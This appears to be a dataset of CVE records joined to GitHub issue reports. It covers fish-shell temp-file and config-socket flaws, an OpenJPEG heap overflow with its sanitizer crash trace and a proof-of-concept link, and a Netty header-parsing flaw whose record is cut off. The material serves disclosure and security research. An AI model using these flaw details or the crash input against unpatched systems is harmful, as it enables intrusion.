cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2014-2906
2020-01-28T16:15:12.133
The psub function in fish (aka fish-shell) 1.16.0 before 2.1.1 does not properly create temporary files, which allows local users to execute arbitrary commands via a temporary file with a predictable name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2014/04/28/4" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fish-shell/fish-shell/issues/1437" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/fish-shell/fish-shell/releases/tag/2.1.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2014/04/28/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fish-shell/fish-shell/issues/1437" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/fish-shell/fish-shell/releases/tag/2.1.1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fishshell:fish:*:*:*:*:*:*:*:*", "matchCriteriaId": "97A46CC4-CAF5-4ECB-8025-5FC5AC4068EA", "versionEndExcluding": "2.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/fish-shell/fish-shell/issues/1437
[ "Third Party Advisory" ]
github.com
[ "fish-shell", "fish-shell" ]
`psub` and `funced` both create temporary files using reasonably predictable names and are vulnerable to a race condition. For `funced`, the file is sourced directly, allowing privilege escalation (CVE-2014-3856). For `psub`, the file is given as an argument to other programs, allowing incorrect input to these programs (CVE-2014-2906).
psub and funced don't protect tempfiles (CVE-2014-2906 and CVE-2014-3856)
https://api.github.com/repos/fish-shell/fish-shell/issues/1437/comments
0
2014-04-28T02:42:09Z
2020-04-19T02:03:40Z
https://github.com/fish-shell/fish-shell/issues/1437
32,327,861
1,437
1,044
CVE-2014-2914
2020-01-28T16:15:12.197
fish (aka fish-shell) 2.0.0 before 2.1.1 does not restrict access to the configuration service (aka fish_config), which allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by set_prompt.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2014/04/28/4" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fish-shell/fish-shell/issues/1438" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2014/04/28/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fish-shell/fish-shell/issues/1438" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fishshell:fish:*:*:*:*:*:*:*:*", "matchCriteriaId": "8DF37E4B-7053-4B60-AFA9-A364954804C9", "versionEndExcluding": "2.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/fish-shell/fish-shell/issues/1438
[ "Third Party Advisory" ]
github.com
[ "fish-shell", "fish-shell" ]
Before 6d749789ce and 44b35f773 anyone\* could connect to a running fish_config server and send code to (e.g.) set_prompt, which is obviously bad. That's been clamped down to localhost-only now, which helps, but it's still possible for someone on your local machine to wait for you to start fish_config and then talk to the server. There's a perfect API for verifying who is on the other end of a local IP/IPv6 socket - getpeerucred(3). Unfortunately, it's only available on Solaris. We could include an authentication key in the URL, but that could be read from the command line.
Restrict fish_config socket connections (CVE-2014-2914)
https://api.github.com/repos/fish-shell/fish-shell/issues/1438/comments
6
2014-04-28T02:43:07Z
2020-04-19T03:03:23Z
https://github.com/fish-shell/fish-shell/issues/1438
32,327,897
1,438
1,045
CVE-2020-8112
2020-01-28T18:15:11.743
opj_t1_clbl_decode_processor in openjp2/t1.c in OpenJPEG 2.3.1 through 2020-01-28 has a heap-based buffer overflow in the qmfbid==1 case, a different issue than CVE-2020-6851.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0550" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0569" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0570" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0694" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1231" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00035.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00008.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EFM77GIFWHOECNIERYJQPI2ZJU57GZD5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFEVEKETJV7GOXD5RDWL35ESEDHC663E/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2021/dsa-4882" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0550" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0569" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0570" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2020:0694" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1231" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00035.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EFM77GIFWHOECNIERYJQPI2ZJU57GZD5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFEVEKETJV7GOXD5RDWL35ESEDHC663E/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2021/dsa-4882" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.oracle.com/security-alerts/cpujul2020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:2.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "22C33617-4369-4A1B-9C49-27BAE05D8BAE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/uclouvain/openjpeg/issues/1231
[ "Exploit", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
Hi, This overflow looks similar to #1228 but still works on latest master (b63a433ba168bad5fa10e83de04d6305e6a222e2): ``` $ build_afl/bin/opj_decompress -i ../openjpeg/afl_symcc_5_out/afl-slave/crashes/id:000000,sig:06,sync:symcc,src:002975 -o /tmp/image_verification.pgm =========================================== The extension of this file is incorrect. FOUND 2975. SHOULD BE .jp2 =========================================== [INFO] Start to read j2k main header (884). [INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image [INFO] Header of tile 1 / 1 has been read. ================================================================= ==3010==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fb19e1f8918 at pc 0x7fb1a258d7e9 bp 0x7ffd68100b90 sp 0x7ffd68100b88 WRITE of size 16 at 0x7fb19e1f8918 thread T0 #0 0x7fb1a258d7e8 in opj_t1_clbl_decode_processor /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/t1.c:1765:73 #1 0x7fb1a2441e05 in opj_thread_pool_submit_job /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/thread.c:835:9 #2 0x7fb1a256f753 in opj_t1_decode_cblks /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/t1.c:1901:21 #3 0x7fb1a263ca3c in opj_tcd_t1_decode /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/tcd.c:1969:9 #4 0x7fb1a263ca3c in opj_tcd_decode_tile /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/tcd.c:1623 #5 0x7fb1a24bfe91 in opj_j2k_decode_tile /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:8932:11 #6 0x7fb1a24fd969 in opj_j2k_decode_tiles /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:10763:15 #7 0x7fb1a24cd165 in opj_j2k_exec /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:8090:33 #8 0x7fb1a24cd165 in opj_j2k_decode /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:11066 #9 0x7fb1a2517dae in opj_jp2_decode /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/jp2.c:1603:11 #10 0x512f27 in main /home/seba/tested_software/openjpeg_patched/src/bin/jp2/opj_decompress.c:1542:19 #11 0x7fb1a20b709a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a) #12 0x42f719 in _start (/home/seba/tested_software/openjpeg_patched/build_afl/bin/opj_decompress+0x42f719) 0x7fb19e1f8918 is located 0 bytes to the right of 9998616-byte region [0x7fb19d86f800,0x7fb19e1f8918) allocated by thread T0 here: #0 0x4dbd99 in __interceptor_posix_memalign (/home/seba/tested_software/openjpeg_patched/build_afl/bin/opj_decompress+0x4dbd99) #1 0x7fb1a265b9c7 in opj_aligned_alloc_n /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/opj_malloc.c:61:9 #2 0x7fb1a265b9c7 in opj_aligned_malloc /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/opj_malloc.c:209 #3 0x7fb1a263af32 in opj_alloc_tile_component_data /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/tcd.c:694:39 #4 0x7fb1a263af32 in opj_tcd_decode_tile /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/tcd.c:1530 #5 0x7fb1a24bfe91 in opj_j2k_decode_tile /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:8932:11 #6 0x7fb1a24fd969 in opj_j2k_decode_tiles /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:10763:15 #7 0x7fb1a24cd165 in opj_j2k_exec /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:8090:33 #8 0x7fb1a24cd165 in opj_j2k_decode /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/j2k.c:11066 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seba/tested_software/openjpeg_patched/src/lib/openjp2/t1.c:1765:73 in opj_t1_clbl_decode_processor Shadow bytes around the buggy address: 0x0ff6b3c370d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff6b3c370e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff6b3c370f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff6b3c37100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff6b3c37110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ff6b3c37120: 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff6b3c37130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff6b3c37140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff6b3c37150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff6b3c37160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff6b3c37170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3010==ABORTING ``` Steps to reproduce as in #1228; the crashing input is available [here](http://www.s3.eurecom.fr/~seba/openjpeg_poc2). Thank you!
Another heap buffer overflow in libopenjp2
https://api.github.com/repos/uclouvain/openjpeg/issues/1231/comments
2
2020-01-28T11:05:53Z
2020-01-30T12:28:26Z
https://github.com/uclouvain/openjpeg/issues/1231
556,135,856
1,231
1,046
CVE-2019-20444
2020-01-29T21:15:11.047
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/netty/netty/issues/9866" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r059b042bca47be53ff8a51fd04d95eb01bb683f1afa209db136e8cb7%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r0aa8b28e76ec01c697b15e161e6797e88fc8d406ed762e253401106e%40%3Ccommits.camel.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r0c3d49bfdbc62fd3915676433cc5899c5506d06da1c552ef1b7923a5%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d%40%3Cdev.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f%40%3Cissues.spark.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r34912a9b1a5c269a77b8be94ef6fb6d1e9b3c69129719dc00f01cf0b%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r489886fe72a98768eed665474cba13bad8d6fe0654f24987706636c5%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r8402d67fdfe9cf169f859d52a7670b28a08eff31e54b522cc1432532%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r86befa74c5cd1482c711134104aec339bf7ae879f2c4437d7ec477d4%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r90030b0117490caed526e57271bf4d7f9b012091ac5083c895d16543%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f%40%3Cdev.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7%40%3Cissues.flink.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb3361f6c6a5f834ad3db5e998c352760d393c0891b8d3bea90baa836%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rc7eb5634b71d284483e58665b22bf274a69bd184d9bd7ede52015d91%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rcb2c59428f34d4757702f9ae739a8795bda7bea97b857e708a9c62c6%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e%40%3Cissues.flink.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdd5d243a5f8ed8b83c0104e321aa420e5e98792a95749e3c9a54c0b9%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/re0b78a3d0a4ba2cf9f4e14e1d05040bde9051d5c78071177186336c9%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": 